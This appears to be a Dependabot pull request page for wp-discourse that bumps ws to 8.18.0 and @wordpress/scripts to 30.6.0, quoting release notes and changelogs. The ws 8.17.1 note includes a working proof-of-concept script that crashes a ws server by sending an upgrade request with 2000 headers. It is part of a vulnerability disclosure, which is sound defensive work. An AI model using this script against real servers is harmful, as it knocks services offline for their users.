wp-discourse
wp-discourse copied to clipboard
Bump ws and @wordpress/scripts in /blocks/comments
Bumps ws to 8.18.0 and updates ancestor dependency @wordpress/scripts. These dependencies need to be updated together.
Updates ws from 7.5.9 to 8.18.0
Release notes
Sourced from ws's releases.
8.18.0
Features
- Added support for
Blob(#2229).8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[
server.maxHeadersCount][] threshold could be used to crash a ws server.const http = require('http'); const WebSocket = require('ws');const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0;
for (let i = 0; i < chars.length; i++) { if (count === 2000) break;
for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x';if (++count === 2000) break; }
}
headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13';
const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port });
request.end(); });
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
... (truncated)
Commits
976c53c[dist] 8.18.059b9629[feature] Add support forBlob(#2229)0d1b5e6[security] Use more descriptive text for 2017 vulnerability link15f11a0[security] Add new DoS vulnerability to SECURITY.md3c56601[dist] 8.17.1e55e510[security] Fix crash when the Upgrade header cannot be read (#2231)6a00029[test] Increase code coverageddfe4a8[perf] Reduce the amount ofcrypto.randomFillSync()callsb73b118[dist] 8.17.029694a5[test] Use thehighWaterMarkvariable- Additional commits viewable in compare view
Updates @wordpress/scripts from 27.5.0 to 30.6.0
Changelog
Sourced from @wordpress/scripts's changelog.
30.6.0 (2024-11-27)
30.5.1 (2024-11-18)
Bug Fix
- Revert changes from #61121 that inlined CSS files imported from other CSS files before optimization in the
buildcommand.30.5.0 (2024-11-16)
Bug Fix
- Make
startscript more resilient for developer errors (#66752).30.4.0 (2024-10-30)
Enhancements
- Add BlueOak-1.0.0 the GPLv2-compatible licenses recognized by check-licenses (#66139).
- Add an optional
--root-folderargument to theplugin-zipcommand (#61375). By default, the command will use the plugin's name as the root folder of the zip. If the change in the behavior impacted your workflow, you could pass--no-root-folderto remove the root folder.Internal
- Refactor to extract license related logic to a reusable module (#66179).
30.3.0 (2024-10-17)
New Features
- Add new
build-blocks-manifestcommand to generate a PHP file containing block metadata from allblock.jsonfiles in a project (#65866).30.2.0 (2024-10-16)
30.1.0 (2024-10-03)
30.0.0 (2024-09-19)
Breaking Changes
- Updated
stylelintdependency to^16.8.2(#64828).- Switched default config from
@wordpress/stylelint-config/scssto use@wordpress/stylelint-config/scss-stylisticto keep stylistic rules (#64828).29.0.0 (2024-09-05)
Breaking Changes
- Fixed the issue with having 5 high severity vulnerabilities by upgrading the
puppeteer-corepackage to the latest major version^23.1.0(#64597).Enhancements
... (truncated)
Commits
cce81c1chore(release): publish6db1992Update changelog filesb24995achore(release): publishb25f82fUpdate changelog filesfdbe988WP Scripts: Revert changes that inline CSS imports early in the build process...510540dchore(release): publish854d8c7Update changelog fileseac92a2Merge changes published in the Gutenberg plugin "release/19.7" branchdcf4613chore(release): publish29094acUpdate changelog files- Additional commits viewable in compare view
You can trigger a rebase of this PR by commenting @dependabot rebase.
Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebasewill rebase this PR@dependabot recreatewill recreate this PR, overwriting any edits that have been made to it@dependabot mergewill merge this PR after your CI passes on it@dependabot squash and mergewill squash and merge this PR after your CI passes on it@dependabot cancel mergewill cancel a previously requested merge and block automerging@dependabot reopenwill reopen this PR if it is closed@dependabot closewill close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually@dependabot show <dependency name> ignore conditionswill show all of the ignore conditions of the specified dependency@dependabot ignore this major versionwill close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this minor versionwill close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this dependencywill close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.